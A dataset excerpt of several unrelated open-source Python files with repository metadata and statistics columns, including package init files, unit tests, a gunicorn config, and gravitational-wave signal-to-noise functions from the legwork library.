] | 3,412
|
2015-01-06T12:13:33.000Z
|
2022-03-31T17:25:41.000Z
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
] | 811
|
2015-01-11T03:33:48.000Z
|
2022-03-28T11:57:49.000Z
|
# sping:: pyart
from pidPyart import *
| 10
| 22
| 0.7
| 5
| 40
| 5.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 40
| 3
| 23
| 13.333333
| 0.875
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f74ecf6a233af7df8150ce1a4e7ffd0bcbd2bdf1
| 179
|
py
|
Python
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 1
|
2022-02-24T21:50:06.000Z
|
2022-02-24T21:50:06.000Z
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 2
|
2022-02-24T19:53:02.000Z
|
2022-02-24T20:13:26.000Z
|
kosmos/__init__.py
|
abostroem/kosmos
|
63758bb622a6ec83aeb3ac2350ccda5c6c1ef63b
|
[
"MIT"
] | 3
|
2022-01-26T18:27:42.000Z
|
2022-03-16T13:50:03.000Z
|
from .fluxcal import *
from .flatfield import *
from .apextract import *
from .identify import *
from .imtools import *
from .wrappers import *
from .version import __version__
| 22.375
| 32
| 0.759777
| 22
| 179
| 6
| 0.409091
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167598
| 179
| 7
| 33
| 25.571429
| 0.885906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f75b9b9647005c21e38a99bf926273af8a143343
| 814
|
py
|
Python
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | 5
|
2019-06-14T10:10:07.000Z
|
2021-12-20T17:46:53.000Z
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | 13
|
2019-06-13T21:00:58.000Z
|
2021-05-12T19:35:40.000Z
|
tests/test_cli.py
|
brunobord/static-markdown
|
7d9d7f3b76068087b3754cf15d2ae4d2dc2a5531
|
[
"MIT"
] | null | null | null |
from unittest.mock import MagicMock, patch
from static_markdown.server import main
def test_main_regular_call():
with patch("argparse.ArgumentParser.parse_args") as argument_mock:
argument_mock.return_value = MagicMock(version=False, root=".", port=9999)
with patch("http.server.HTTPServer.serve_forever") as serve_mock:
serve_mock.return_value = True
main()
serve_mock.assert_called_once()
def test_main_with_version():
with patch("argparse.ArgumentParser.parse_args") as argument_mock:
argument_mock.return_value = MagicMock(version=True, root=".", port=9999)
with patch("http.server.HTTPServer.serve_forever") as serve_mock:
serve_mock.return_value = True
main()
serve_mock.assert_not_called()
| 37
| 82
| 0.701474
| 102
| 814
| 5.313725
| 0.362745
| 0.099631
| 0.110701
| 0.114391
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0.738007
| 0
| 0.012346
| 0.203931
| 814
| 21
| 83
| 38.761905
| 0.824074
| 0
| 0
| 0.5
| 0
| 0
| 0.174447
| 0.17199
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.125
| true
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7660b63ae4b4bf70baaf90c26ab90dff9955375
| 165
|
py
|
Python
|
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | null | null | null |
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | null | null | null |
app/api_v1/__init__.py
|
smolveau/TodoMessengerBot
|
a645152f00748d7c96cbef69ea593a7023b53dc7
|
[
"MIT"
] | 1
|
2018-08-03T15:27:07.000Z
|
2018-08-03T15:27:07.000Z
|
from flask import Blueprint
api = Blueprint('api_v1', __name__)
# Import any endpoints here to make them available
from . import webhook
from . import webhook_dev
| 20.625
| 50
| 0.781818
| 24
| 165
| 5.125
| 0.666667
| 0.195122
| 0.276423
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.163636
| 165
| 7
| 51
| 23.571429
| 0.884058
| 0.290909
| 0
| 0
| 0
| 0
| 0.052174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
e3aaa40a36af4a7df0cb9dd65a597d6464c9afa7
| 43
|
py
|
Python
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2021-02-17T08:12:33.000Z
|
2021-02-17T08:12:33.000Z
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2020-12-31T14:36:29.000Z
|
2020-12-31T14:36:29.000Z
|
mlrun/utils/version/__init__.py
|
Hedingber/mlrun
|
e2269718fcc7caa7e1aa379ac28495830b45f9da
|
[
"Apache-2.0"
] | 1
|
2021-08-30T21:43:38.000Z
|
2021-08-30T21:43:38.000Z
|
from .version import Version # noqa: F401
| 21.5
| 42
| 0.744186
| 6
| 43
| 5.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 0.186047
| 43
| 1
| 43
| 43
| 0.828571
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e3d7acb78adc1b388116a6b4641fd335ad007b36
| 147
|
py
|
Python
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | 2
|
2019-04-30T23:51:41.000Z
|
2019-05-04T00:35:52.000Z
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | 27
|
2019-04-30T20:22:28.000Z
|
2022-02-10T08:10:32.000Z
|
gunicorn_config.py
|
mikaponics/mikaponics-back
|
98e1ff8bab7dda3492e5ff637bf5aafd111c840c
|
[
"BSD-3-Clause"
] | null | null | null |
command = '/opt/django/mikaponics-back/env/bin/gunicorn'
pythonpath = '/opt/django/mikaponics-back/mikaponics'
bind = '127.0.0.1:8001'
workers = 3
| 29.4
| 56
| 0.741497
| 22
| 147
| 4.954545
| 0.727273
| 0.165138
| 0.348624
| 0.422018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081481
| 0.081633
| 147
| 4
| 57
| 36.75
| 0.725926
| 0
| 0
| 0
| 0
| 0
| 0.653061
| 0.557823
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
540729192759137cb0afd42990831676554373fd
| 657
|
py
|
Python
|
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | 5
|
2015-12-14T15:14:23.000Z
|
2022-02-09T10:15:33.000Z
|
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | null | null | null |
meridian/channels/lung.py
|
sinotradition/meridian
|
8c6c1762b204b72346be4bbfb74dedd792ae3024
|
[
"Apache-2.0"
] | 3
|
2015-11-27T05:23:49.000Z
|
2020-11-28T09:01:56.000Z
|
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
from meridian.acupoints import zhongfu13
from meridian.acupoints import yunmen22
from meridian.acupoints import tianfu13
from meridian.acupoints import xiabai22
from meridian.acupoints import chize32
from meridian.acupoints import kongzui34
from meridian.acupoints import lieque41
from meridian.acupoints import jingqu12
from meridian.acupoints import taiyuan41
from meridian.acupoints import yuji24
from meridian.acupoints import shaoshang31
SPELL=u'shǒutàiyīnfèijīng'
CN=u'手太阴肺经'
ABBR=u'LU'
NAME='lung'
FULLNAME='LungChannelofHand-Taiyin'
SEQ=1
if __name__ == '__main__':
pass
| 19.323529
| 42
| 0.808219
| 84
| 657
| 6.22619
| 0.488095
| 0.25239
| 0.441683
| 0.567878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041237
| 0.114155
| 657
| 33
| 43
| 19.909091
| 0.857388
| 0.082192
| 0
| 0
| 0
| 0
| 0.10101
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.052632
| 0.578947
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
580af26b740a7304c8b21122e96ccdb142f1d603
| 15,766
|
py
|
Python
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | 12
|
2021-02-22T23:24:42.000Z
|
2021-08-05T21:47:55.000Z
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | 24
|
2021-02-12T22:41:08.000Z
|
2021-09-23T21:13:16.000Z
|
legwork/snr.py
|
katiebreivik/LEGWORK
|
07c3938697ca622fc39d9617d74f28262ac2b1aa
|
[
"MIT"
] | null | null | null |
"""Functions to calculate signal-to-noise ratio in four different cases"""
import numpy as np
from legwork import strain, psd, utils, evol
import astropy.units as u
__all__ = ['snr_circ_stationary', 'snr_ecc_stationary',
'snr_circ_evolving', 'snr_ecc_evolving']
def snr_circ_stationary(m_c, f_orb, dist, t_obs, position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None, instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
"""
# only need to compute n=2 harmonic for circular
h_0_circ_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=np.zeros_like(f_orb).value, n=2, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g).flatten()**2
h_f_src_circ_2 = h_0_circ_2 * t_obs
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb, t_obs=t_obs, instrument=instrument,
custom_psd=custom_psd)
snr = (h_f_src_circ_2 / h_f_lisa_2)**0.5
return snr.decompose()
def snr_ecc_stationary(m_c, f_orb, ecc, dist, t_obs, harmonics_required,
position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
ecc : `float/array`
Eccentricity
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
harmonics_required : `integer`
Maximum integer harmonic to compute
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
The total can be retrieving by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if ``ret_max_snr_harmonic=True``)
"""
# define range of harmonics
n_range = np.arange(1, harmonics_required + 1).astype(int)
# calculate source signal
h_0_ecc_n_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=ecc, n=n_range, dist=dist,
position=position, polarisation=polarisation,
inclination=inclination, interpolated_g=interpolated_g)**2
# reshape the output since only one timestep
h_0_ecc_n_2 = h_0_ecc_n_2.reshape(len(m_c), harmonics_required)
h_f_src_ecc_2 = h_0_ecc_n_2 * t_obs
# calculate harmonic frequencies and noise
f_n = n_range[np.newaxis, :] * f_orb[:, np.newaxis]
if interpolated_sc is not None:
h_f_lisa_n_2 = interpolated_sc(f_n.flatten())
h_f_lisa_n_2 = h_f_lisa_n_2.reshape(f_n.shape)
else:
h_f_lisa_n_2 = psd.power_spectral_density(f=f_n, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
snr_n_2 = (h_f_src_ecc_2 / h_f_lisa_n_2).decompose()
if ret_snr2_by_harmonic:
return snr_n_2
# calculate the signal-to-noise ratio
snr = (np.sum(snr_n_2, axis=1))**0.5
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
def snr_circ_evolving(m_1, m_2, f_orb_i, dist, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None,
instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
n_step : `int`
Number of time steps during observation duration
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
sn : `float/array`
SNR for each binary
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_circ(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
t_evol = np.minimum(t_merge - (1 * u.s), t_obs)
# get f_orb evolution
f_orb_evol = evol.evol_circ(t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
maxes = np.where(f_orb_evol == 1e2 * u.Hz, -1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# calculate the characteristic power
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=np.zeros_like(f_orb_evol).value, n=2, dist=dist,
interpolated_g=interpolated_g)**2
h_c_n_2 = h_c_n_2.reshape(len(m_c), n_step)
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb_evol.flatten())
h_f_lisa_2 = h_f_lisa_2.reshape(f_orb_evol.shape)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb_evol, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
h_c_lisa_2 = (2 * f_orb_evol)**2 * h_f_lisa_2
snr = np.trapz(y=h_c_n_2 / h_c_lisa_2, x=2 * f_orb_evol, axis=1)**0.5
return snr.decompose()
def snr_ecc_evolving(m_1, m_2, f_orb_i, dist, ecc, harmonics_required, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None, n_proc=1,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and evolving sources.
Note that this function will not work for exactly circular (ecc = 0.0)
binaries.
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
ecc : `float/array`
Eccentricity
harmonics_required : `int`
Maximum integer harmonic to compute
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
n_step : `int`
Number of time steps during observation duration
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
n_proc : `int`
Number of processors to split eccentricity evolution over, where
the default is n_proc=1
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
The total can be retrieving by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if
``ret_max_snr_harmonic=True``)
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_ecc(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i, ecc_i=ecc)
t_before = 0.1 * u.yr
t_evol = np.minimum(t_merge - t_before, t_obs).to(u.s)
# get eccentricity and f_orb evolutions
e_evol, f_orb_evol = evol.evol_ecc(ecc_i=ecc, t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2,
f_orb_i=f_orb_i, n_proc=n_proc, t_before=t_before, t_merge=t_merge)
maxes = np.where(np.logical_and(e_evol == 0.0, f_orb_evol == 1e2 * u.Hz),
-1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# create harmonics list and multiply for nth frequency evolution
harms = np.arange(1, harmonics_required + 1).astype(int)
f_n_evol = harms[np.newaxis, np.newaxis, :] * f_orb_evol[..., np.newaxis]
# calculate the characteristic strain
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=e_evol, n=harms, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g)**2
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa = interpolated_sc(f_n_evol.flatten())
else:
h_f_lisa = psd.power_spectral_density(f=f_n_evol.flatten(), t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
h_f_lisa = h_f_lisa.reshape(f_n_evol.shape)
h_c_lisa_2 = f_n_evol**2 * h_f_lisa
snr_evol = h_c_n_2 / h_c_lisa_2
# integrate, sum and square root to get SNR
snr_n_2 = np.trapz(y=snr_evol, x=f_n_evol, axis=1)
if ret_snr2_by_harmonic:
return snr_n_2
snr_2 = snr_n_2.sum(axis=1)
snr = np.sqrt(snr_2)
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
| 38.360097
| 110
| 0.661614
| 2,339
| 15,766
| 4.236426
| 0.099615
| 0.01978
| 0.016954
| 0.01211
| 0.850237
| 0.823191
| 0.802906
| 0.796448
| 0.781108
| 0.767686
| 0
| 0.014688
| 0.252949
| 15,766
| 410
| 111
| 38.453659
| 0.826626
| 0.552899
| 0
| 0.444444
| 0
| 0
| 0.013651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
58739c434d6fe1bf754096d072202b7c23ac5f69
| 2,508
|
py
|
Python
|
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | 1
|
2019-10-17T17:46:16.000Z
|
2019-10-17T17:46:16.000Z
|
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | null | null | null |
tests/sentry/api/endpoints/test_broadcast_details.py
|
pierredup/sentry
|
0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
import six
from sentry.models import Broadcast, BroadcastSeen
from sentry.testutils import APITestCase
class BroadcastDetailsTest(APITestCase):
def test_simple(self):
broadcast1 = Broadcast.objects.create(message="bar", is_active=True)
Broadcast.objects.create(message="foo", is_active=False)
self.login_as(user=self.user)
response = self.client.get(u"/api/0/broadcasts/{}/".format(broadcast1.id))
assert response.status_code == 200
assert response.data["id"] == six.text_type(broadcast1.id)
class BroadcastUpdateTest(APITestCase):
def test_regular_user(self):
broadcast1 = Broadcast.objects.create(message="bar", is_active=True)
broadcast2 = Broadcast.objects.create(message="foo", is_active=False)
self.add_user_permission(user=self.user, permission="broadcasts.admin")
self.login_as(user=self.user)
response = self.client.put(
u"/api/0/broadcasts/{}/".format(broadcast1.id), {"hasSeen": "1", "message": "foobar"}
)
assert response.status_code == 200
assert response.data["hasSeen"]
assert BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast1).exists()
assert not BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast2).exists()
broadcast1 = Broadcast.objects.get(id=broadcast1.id)
assert broadcast1.message == "bar"
broadcast2 = Broadcast.objects.get(id=broadcast2.id)
assert broadcast2.message == "foo"
def test_superuser(self):
broadcast1 = Broadcast.objects.create(message="bar", is_active=True)
broadcast2 = Broadcast.objects.create(message="foo", is_active=False)
self.add_user_permission(user=self.user, permission="broadcasts.admin")
self.login_as(user=self.user, superuser=True)
response = self.client.put(
u"/api/0/broadcasts/{}/".format(broadcast1.id), {"hasSeen": "1", "message": "foobar"}
)
assert response.status_code == 200
assert response.data["hasSeen"]
assert BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast1).exists()
assert not BroadcastSeen.objects.filter(user=self.user, broadcast=broadcast2).exists()
broadcast1 = Broadcast.objects.get(id=broadcast1.id)
assert broadcast1.message == "foobar"
broadcast2 = Broadcast.objects.get(id=broadcast2.id)
assert broadcast2.message == "foo"
| 41.114754
| 97
| 0.689394
| 289
| 2,508
| 5.892734
| 0.207612
| 0.093952
| 0.063418
| 0.102173
| 0.831474
| 0.831474
| 0.831474
| 0.812096
| 0.785672
| 0.735173
| 0
| 0.019052
| 0.183812
| 2,508
| 60
| 98
| 41.8
| 0.812897
| 0
| 0
| 0.622222
| 0
| 0
| 0.074163
| 0.02512
| 0
| 0
| 0
| 0
| 0.311111
| 1
| 0.066667
| false
| 0
| 0.088889
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
543b67388ed70f0bb63b95f51eeb3b46c3853782
| 19,767
|
py
|
Python
|
apysc/_console/assertion.py
|
simon-ritchie/apyscript
|
c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279
|
[
"MIT"
] | 16
|
2021-04-16T02:01:29.000Z
|
2022-01-01T08:53:49.000Z
|
apysc/_console/assertion.py
|
simon-ritchie/apysc
|
61d0078e5f3b702eaacceedfbe6e5cafe48f8033
|
[
"MIT"
] | 613
|
2021-03-24T03:37:38.000Z
|
2022-03-26T10:58:37.000Z
|
apysc/_console/assertion.py
|
simon-ritchie/apyscript
|
c319f8ab2f1f5f7fad8d2a8b4fc06e7195476279
|
[
"MIT"
] | 2
|
2021-06-20T07:32:58.000Z
|
2021-12-26T08:22:11.000Z
|
"""Each js assertion (console.assert) interface implementations.
Mainly following interfaces are defined:
- assert_equal
JavaScript assertion interface for equal condition.
- assert_not_equal
JavaScript assertion interface for not equal condition.
- assert_true
JavaScript assertion interface for true condition.
- assert_false
JavaScript assertion interface for false condition.
- assert_arrays_equal
JavaScript assertion interface for Array values equal condition.
